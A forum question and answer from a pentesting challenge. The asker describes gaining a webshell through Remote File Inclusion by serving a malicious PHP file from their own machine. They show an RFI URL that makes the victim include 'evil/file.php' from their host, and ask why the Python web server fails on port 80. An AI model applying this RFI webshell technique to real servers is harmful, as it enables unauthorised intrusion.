I am doing a pentesting challenge and I am working on one machine that requires gaining access through a Remote File Inclusion vulnerability. In the past I was able to get a webshell by including a malicious file on my machine. I did so using the python http.server modules (sudo python3 -m http.server 80) and this worked absolutely fine. However, after the first time of doing so successfully, I have attempted to run this command again and every time I do I get the following error:
File "/usr/lib/python3.7/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/usr/lib/python3.7/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/usr/lib/python3.7/http/server.py", line 1262, in <module>
test(HandlerClass=handler_class, port=args.port, bind=args.bind)
File "/usr/lib/python3.7/http/server.py", line 1230, in test
with ServerClass(server_address, HandlerClass) as httpd:
File "/usr/lib/python3.7/socketserver.py", line 452, in __init__
self.server_bind()
File "/usr/lib/python3.7/http/server.py", line 137, in server_bind
socketserver.TCPServer.server_bind(self)
File "/usr/lib/python3.7/socketserver.py", line 466, in server_bind
self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
This appears to be telling me that something is already using port 80 however when I close web browsers, check using lsof -i :80, even restart my machine it still never works. I have also attempted to include the file over a different port (http://VICTIMIP/path/to/file.php?vuln_param=http://MYIP:4444/path/to/evil/file.php) but this doesn't work. Can anybody give any advice on how to move forward? Either on why the http-server wouldn't be working on port 80 ever or why an RFI would only work over port 80? I can't really think of anything else I can try at this point.
I guess you are using Kali Linux or something like that. It contains apache/nginx preinstalled, so try following before using python http server:
(requires root)
Port is clearly in use, so it can help if nginx or apache is installed.